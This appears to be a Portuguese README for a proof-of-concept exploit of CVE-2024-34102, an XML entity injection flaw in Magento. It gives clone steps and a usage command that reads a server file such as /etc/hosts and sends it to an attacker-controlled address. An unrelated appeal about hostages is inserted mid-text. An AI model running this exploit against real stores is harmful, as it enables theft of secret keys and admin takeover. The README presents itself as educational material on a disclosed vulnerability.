
Prova de conceito de exploit para CVE-2024-34102, uma injeção crítica de entidade XML no Magento, que permite a exfiltração de arquivos sensíveis e acesso não autorizado ao administrador. Para uso educacional.
Exigimos o retorno seguro de todos os cidadãos que foram feitos reféns pelo grupo terrorista Hamas. Não descansaremos até que todos os reféns sejam libertados e retornem em segurança para casa. Você pode ajudar a trazê-los de volta. https://stories.bringthemhomenow.net/
Este repositório contém uma prova de conceito (PoC) de exploit para a vulnerabilidade crítica de injeção de entidade XML (CVE-2024-34102) no Magento. Esta vulnerabilidade permite a exfiltração de arquivos sensíveis, que podem então ser usados para obter acesso não autorizado às funcionalidades administrativas do Magento. Este exploit foi projetado para fins educacionais e deve ser usado com responsabilidade.
O Magento é uma das soluções de e-commerce mais populares usadas globalmente. Em junho de 2024, foi descoberto um problema crítico de injeção de entidade XML pré-autenticação, identificado como CVE-2024-34102. Esta vulnerabilidade pode levar a consequências graves, incluindo a exfiltração do arquivo app/etc/env.php do Magento, que contém chaves criptográficas usadas para assinar JWTs.
requests (pip install requests)Clone o repositório:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
Execute o script com os argumentos necessários:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: A URL da instância alvo do Magento.--target-file: O caminho do arquivo no servidor alvo a ser exfiltrado.--exfil-url: A URL para receber os dados exfiltrados.python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999